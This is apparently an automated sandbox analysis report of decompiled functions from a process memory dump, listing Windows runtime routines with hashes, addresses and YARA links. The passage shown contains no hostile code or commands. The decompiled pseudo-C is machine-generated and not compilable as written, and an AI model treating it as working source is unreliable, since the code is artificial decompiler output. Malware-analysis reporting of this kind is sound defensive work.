Opcode Fuzzy Hash: 5182cf752899d9ab6a5ebc303ee66f629221d4366d952c067c2a16b833e46858
Instruction Fuzzy Hash: 9C312831646601EFD725AF18CD40B667779FF10728F504A6AE8554F5B1EB30F840DAD0

Uniqueness

Uniqueness Score: -1.00%

Function 04AF3D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04AF3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04AC7B60(0, _t61, 0x4a911c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04AC7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04AD4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x04af3d4c
0x04af3d50
0x04af3d55
0x04af3d5e
0x04b2e79a
0x00000000
0x04b2e79a
0x04af3d68
0x04b2e789
0x04af3d9d
0x04af3da3
0x04af3daf
0x04af3db5
0x04af3dbc
0x04af3dc4
0x04af3dc9
0x04af3dce
0x04b2e7ae
0x04b2e7ae
0x04af3dde
0x04af3de2
0x04af3de7
0x04af3e0d
0x04af3e13
0x04af3e16
0x04af3e1e
0x04af3e25
0x04af3e28
0x00000000
0x00000000
0x04af3e2a
0x04af3e2f
0x04af3e37
0x04af3e37
0x00000000
0x04af3e37
0x04af3e31
0x00000000
0x04af3e31
0x04af3e20
0x04af3e20
0x04af3e35
0x00000000
0x04af3de9
0x04af3de9
0x04af3de9
0x04af3dee
0x04af3dfd
0x04af3dff
0x04af3e02
0x04af3e05
0x04af3e05
0x00000000
0x04af3df0
0x04af3de7
0x04b2e78f
0x04b2e794
0x04af3d79
0x04af3d84
0x04af3d89
0x04af3d8e
0x00000000
0x04b2e7a4
0x04af3d96
0x04af3d9a
0x00000000
0x04af3d9a
0x00000000
0x04b2e794
0x04af3d6e
0x04af3d73
0x00000000
0x04b2e7b5
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99ccca825196b3836a658c75000ec033dc4b999a73cb2d814c13bacc743b188f
Instruction ID: 36db4567c86fa6d18aa473d82e2bb9d23f765f70f22bd7f9bd4ba94170b5e921
Opcode Fuzzy Hash: 99ccca825196b3836a658c75000ec033dc4b999a73cb2d814c13bacc743b188f
Instruction Fuzzy Hash: A031AD31B01625DBDB298F6AC941A6ABBF5EF55700B0584AEF94ACB360E630E840D790

Uniqueness

Uniqueness Score: -1.00%

Function 04AEA61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04AEA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x4b90220);
				E04B0D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x4ba7b9c; // 0x0
				_t55 = L04AD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E04B0D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x4ba7b10 =  *0x4ba7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x4ba536c; // 0x9613a0
					if( *_t51 != 0x4ba5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x4ba5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x4ba536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E04AEA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x04aea61c
0x04aea61e
0x04aea623
0x04aea628
0x04aea62b
0x04aea62d
0x04aea648
0x04aea64a
0x04aea64f
0x04b29b44
0x04aea6ec
0x04aea6f1
0x04aea6f1
0x04aea655
0x04aea657
0x04aea65a
0x04aea65d
0x04aea662
0x04aea663
0x04aea667
0x04aea668
0x04aea66d
0x04aea706
0x04aea706
0x04b29bda
0x04b29be6
0x04b29beb
0x00000000
0x04b29beb
0x04aea679
0x04b29b7a
0x00000000
0x04b29b7a
0x04aea683
0x04aea6f4
0x04aea6f7
0x04aea6f9
0x04aea6fd
0x04aea6a0
0x04aea6a0
0x04aea6ad
0x04aea6af
0x04aea6b4
0x04b29ba7
0x04b29bac
0x00000000
0x00000000
0x04b29bc6
0x04b29bce
0x04b29bd1
0x04b29bd3
0x04b29bd3
0x00000000
0x04b29bd1
0x04aea6bd
0x04aea6c3
0x04aea6c6
0x04aea6d2
0x04aea701
0x04aea704
0x00000000
0x04aea704
0x04aea6d4
0x04aea6d6
0x04aea6d9
0x04aea6db
0x04aea6e1
0x04aea6e6
0x04aea6e8
0x04aea6e8
0x04aea6ea
0x00000000
0x04aea6ea
0x04aea688
0x04aea692
0x04aea694
0x04aea699
0x00000000
0x00000000
0x04aea69d
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caa2833ce504d3a94c7e156360456cf73e48dbf257f411d037ead70fda6ab03d
Instruction ID: 9ebe0a0cd8dced800d6f3985d8abca587b0d0db1c6f1dc3daf741f4abe541fad
Opcode Fuzzy Hash: caa2833ce504d3a94c7e156360456cf73e48dbf257f411d037ead70fda6ab03d
Instruction Fuzzy Hash: 49415AB5B04215DFDB14CF59C990BA9BBF1FB49304F1580AAE819AB340D774BD01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04B37016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04B37016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x4bad360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04B36B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04B36B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04AD7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04AF9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E04AFB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04AD4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x04b37016
0x04b3701e
0x04b3702b
0x04b37033
0x04b37037
0x04b3703c
0x04b3703e
0x04b37041
0x04b37045
0x04b3704a
0x04b37050
0x04b37055
0x04b3705a
0x04b37062
0x04b37062
0x04b3705a
0x04b37064
0x04b37064
0x04b37067
0x04b37071
0x04b37096
0x04b3709b
0x04b370a2
0x04b370a6
0x04b370a7
0x04b370ad
0x04b370b3
0x04b370b6
0x04b370bb
0x04b370c3
0x04b370c3
0x04b370c6
0x04b370cd
0x04b370dd
0x04b370e0
0x04b370e2
0x04b370e2
0x04b370ee
0x04b37101
0x04b370f0
0x04b370f9
0x04b370f9
0x04b3710a
0x04b3710e
0x04b37112
0x04b37117
0x04b37118
0x04b37118
0x04b370bb
0x04b3711d
0x04b37123
0x04b37131
0x04b37131
0x04b37136
0x04b3713d
0x04b3713e
0x04b3713f
0x04b3714a
0x04b3714a
0x04b37084
0x04b37088
0x00000000
0x04b3708e
0x04b3708e
0x04b37092
0x00000000
0x04b37092

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bd6e9c8d5b4506dfa6a462c6be61f2afda5b2c4d61b36dd7c8d37b5c880f3d8
Instruction ID: 64bdd97ef7d1ea3285711ff5728604c3ff2231f608051a0955539a6e712b2cc3
Opcode Fuzzy Hash: 0bd6e9c8d5b4506dfa6a462c6be61f2afda5b2c4d61b36dd7c8d37b5c880f3d8
Instruction Fuzzy Hash: 1031C4B26047519BC321DF69CD41A6BB3E9FF88700F048A69F89597690EB30F914CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04ADC182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E04ADC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04AD7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E04B88D34(_v8, _t80);
					}
					E04AD2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E04ACFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E04B88833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E04ACFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E04AFB180();
						if(_a4 != 0) {
							E04AD2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E04ADBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E04ADBB2D(_t16, _t15);
						E04ADB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E04ACFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E04ACFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E04ACFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x04adc18d
0x04adc18f
0x04adc191
0x04adc19b
0x04adc1a0
0x04adc1d4
0x04adc1de
0x04b22d6e
0x04adc1e4
0x04adc1e4
0x04adc1e4
0x04adc1ec
0x04b22d7d
0x04b22d7d
0x04adc1f3
0x04adc1ff
0x04b22d88
0x04b22d8d
0x04b22d94
0x04b22d94
0x04b22d9f
0x04b22da4
0x04b22dab
0x04b22db0
0x04b22db2
0x04b22db3
0x04b22db4
0x04b22dbc
0x04b22dc3
0x04b22dc3
0x04adc205
0x04adc205
0x04adc208
0x04adc20e
0x04adc211
0x04adc216
0x04adc219
0x04adc21f
0x04adc222
0x04adc22c
0x04adc234
0x04adc23a
0x04adc23f
0x04adc245
0x04adc24b
0x04adc251
0x04adc25a
0x04adc276
0x04adc27d
0x04adc27d
0x04adc25c
0x04adc25c
0x00000000
0x04adc25e
0x04adc1a4
0x04adc1aa
0x04adc1b3
0x04adc265
0x04adc26c
0x04adc26c
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 95bd3d82026500ca51bc9ac20e629572df7aba9d1ce3a55e9671357ed89fba35
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: BF314672B01546AEE704EFB4C580BE9F764FF46218F44419AE01D8B281DB347A06DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 04AEA70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E04AEA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x4ba7b10; // 0x10
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x4ba7b10 = 8;
					 *0x4ba7b14 = 0x4ba7b0c;
					 *0x4ba7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x11
					E04AEA990(0x4ba7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L04AEA840(__edx, __ecx, __ecx, _t52, 0x4ba7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x4ba7b10; // 0x10
					_t3 = _t37 + 0x27; // 0x37
					__eflags = _t3 >> 5 -  *0x4ba7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x4ba7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x37
						_v8 = _t4 >> 5;
						_t50 = L04AD4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x4ba7b18 = _v8;
						_t8 = _t52 + 7; // 0x17
						E04AFF3E0(_t50,  *0x4ba7b14, _t8 >> 3);
						_t28 =  *0x4ba7b14; // 0x77ad7b0c
						__eflags = _t28 - 0x4ba7b0c;
						if(_t28 != 0x4ba7b0c) {
							L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x18
						 *0x4ba7b14 = _t50;
						_t48 = _v12;
						 *0x4ba7b10 = _t9;
						goto L6;
					}
					 *0x4ba7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x04aea713
0x04aea714
0x04aea717
0x04aea71d
0x04aea720
0x04aea722
0x04aea727
0x04aea74a
0x04aea754
0x04aea75e
0x04aea768
0x04aea76a
0x04aea773
0x04aea78b
0x04aea790
0x04aea792
0x04aea741
0x04aea741
0x04aea743
0x04aea749
0x04aea749
0x04aea732
0x04aea73a
0x04aea797
0x04aea79d
0x04aea7a3
0x04aea7a9
0x04aea7b6
0x04aea7bc
0x04aea7ca
0x04aea7e0
0x04aea7e2
0x04aea7e4
0x04b29bf2
0x00000000
0x04b29bf2
0x04aea7ed
0x04aea7f2
0x04aea800
0x04aea805
0x04aea80d
0x04aea812
0x04b29c08
0x04b29c08
0x04aea818
0x04aea81b
0x04aea821
0x04aea824
0x00000000
0x04aea824
0x04aea7ae
0x00000000
0x04aea7ae
0x04aea73c
0x04aea73e
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d111534c2816c3352529ec0be89ef35e865e92d952314033e581df2dd22d751c
Instruction ID: aff396d9d0b8230ae60b3ed72f5afe2be468db0d08522ca013c206a861d810f3
Opcode Fuzzy Hash: d111534c2816c3352529ec0be89ef35e865e92d952314033e581df2dd22d751c
Instruction Fuzzy Hash: 62319CF2B28201ABD711CB18D9A1F69B7F9EB84710F54499BE015C7240DB74ED29CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04AE61A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E04AE61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04AE5E50(0x4a967cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E04B89D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E04ABF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x04ae61b3
0x04ae61b5
0x04ae61bd
0x04ae61c3
0x04ae61c7
0x04ae61d2
0x04ae61ff
0x04ae61ff
0x04ae6201
0x04ae6207
0x04ae6207
0x04ae61d4
0x04ae61d9
0x00000000
0x00000000
0x04ae61df
0x04ae61e2
0x00000000
0x00000000
0x04ae61e6
0x04ae61e8
0x04ae61ee
0x04ae61ee
0x04ae61f9
0x04b2762f
0x04b27632
0x04b27635
0x04b27639
0x04b27640
0x04b2766e
0x04b27675
0x00000000
0x00000000
0x04b27681
0x04b27689
0x04b2768d
0x04b27691
0x04b27695
0x04b27699
0x04b276af
0x04b276b5
0x04b276b7
0x04b276b7
0x04b276d7
0x04b276dc
0x00000000
0x04b276dc
0x04b276a2
0x04b276a9
0x04b27651
0x04b27653
0x04b27653
0x04b27656
0x04b27656
0x00000000
0x04b27656
0x04b27644
0x04b27646
0x04b27648
0x04b27648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e1efa93d4fca5d6ddc93b5c84ba44e8c228a75e64b9bc7b09471a359bad9585
Instruction ID: c6fcbcf583f7466f79599164e56d017830b93dbb8c85cb055245becbcda3bc84
Opcode Fuzzy Hash: 5e1efa93d4fca5d6ddc93b5c84ba44e8c228a75e64b9bc7b09471a359bad9585
Instruction Fuzzy Hash: 8531AD716053118FD361DF0AC900B26B7E4FF98B00F4449ADE8989B351EBB1F904CB95

Uniqueness

Uniqueness Score: -1.00%

Function 04ABAA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E04ABAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x4bad360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x4ba7b9c; // 0x0
					_t53 = L04AD4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E04AFB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E04AFF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L04AC6C59(_t53, _t51, _t58) != 0) {
							_t28 = E04AE5E50(0x4a9c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E04AEB230(_v32, _v28, 0x4a9c2d8, 1,  &_v24);
								_t28 = E04ABF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x04abaa25
0x04abaa29
0x04abaa2d
0x04abaa30
0x04abaa37
0x04abaa3c
0x04b14458
0x04b14458
0x04b14472
0x04b14474
0x04b14476
0x04abaa64
0x04abaa74
0x04b1447c
0x04b14483
0x04b14492
0x04abaa52
0x04abaa54
0x04abaa5e
0x04b144a8
0x04b144ad
0x04b144af
0x04b144b6
0x04b144b6
0x04b144b9
0x04b144bc
0x04b144cd
0x04b144d3
0x04b144d6
0x04b144e1
